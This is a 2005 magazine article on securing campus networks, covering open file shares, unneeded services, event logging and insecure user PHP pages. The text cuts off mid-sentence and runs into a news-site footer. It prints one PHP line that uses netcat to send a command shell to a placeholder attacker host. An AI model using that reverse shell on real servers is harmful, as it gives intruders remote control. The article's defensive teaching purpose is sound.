Information Security in Campus and Open Environments
by Adrian Duane Crenshaw - Originally published in issue 2 of (IN)SECURE Magazine - Tuesday, 23 August 2005.
Using a host based firewall like the one built in the Windows XP SP2 or ZoneAlarms can be a good idea, but better yet is not to have possibly vulnerable services running in the first place. Turning off file sharing on computers that do not need it is a must. Many types of attacks can be averted if an attacker does not have access to administrative shares. Those faculty and staff who must use file and printer sharing should be taught how to set proper share permissions. By default, Windows 2000 gives the Everyone group full read and write access to shares, and Windows XP gives just Read to the Everyone group. To give an example of how bad this can be, letís assume a secretary in one of the offices wants to share a database of student names, Social Security Numbers, and addresses with others in the office. She simply right clicks on the folder she wants to share and takes all of the defaults.

Now one of the students is poking around on the network to see what computers are out there and what shares they can get into.

They could just be curious, or they could be looking for other students that have shared out their MP3 and movie collections. They may just browse around using Network Neighborhood, or use an automated tool like Legion or SoftPerfect's NetScan to find all of the network shares available to them in a certain IP range. While looking around the student comes across a share called ďStudent DatabaseĒ; two guesses what kind of information is in it. Scan your own network for open file shares before someone else does. Besides Legion and NetScan thereís also ShareEnum which can scan for shares by Domain/Workgroup or IP range and report what permissions different groups have to the shares.

Disabling unneeded services like Personal Web Server, SNMP, Simple TCP/IP Services and others can also go a long way to cutting down on potential exploits. Even a system that is behind on service packs and hot fixes canít be exploited if the vulnerable services arenít there to begin with.

Turn off anything that is not used and pay attention to what is being installed on the network.

Unread Logs

Watch the web and security event logs. There are many times where I would not have noticed attackers on the network if it were not for looking in Event Viewer for failed login attempts.

Naturally logging must be turned on for this to work so open up MMC (Microsoft Management Console), add Security Configuration and Analysis, and setup logging of failed logins and access attempts. Better yet, set up a GPO (Group Policy Object) to automatically configure security auditing when a machine logs on to the network.

If an IDS (Intrusion Detection System) is running at the facility make sure someone is looking at the logs. An IDS like Snort is useless if no one actually looks at what is reported.


Most universities give students and staff the ability to create their own web pages on a campus web server. Sometimes the users can even create ASP or PHP files for their website to make them more dynamic.

With PHP installed and configured insecurely a user could run an arbitrary program in their web folder, for example Netcat, with a command like this:

$x = shell_exec("nc AttackingBoxIP 30 -e cmd ");

The previous command shovels a shell back to the attackers, allowing them command line access to the web server and from there they could leap frog to other machines and have their identity obscured as that of the web server. Active Server Pages have similar functionality (


Critical bug found in Cisco ASA products, attackers are scanning for affected devices

Several Cisco ASA products - appliances, firewalls, switches, routers, and security modules - have been found sporting a flaw that can ultimately lead to remote code execution by attackers.

Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.

Daily digest

Receive a daily digest of the latest security news.

Fri, Feb 12th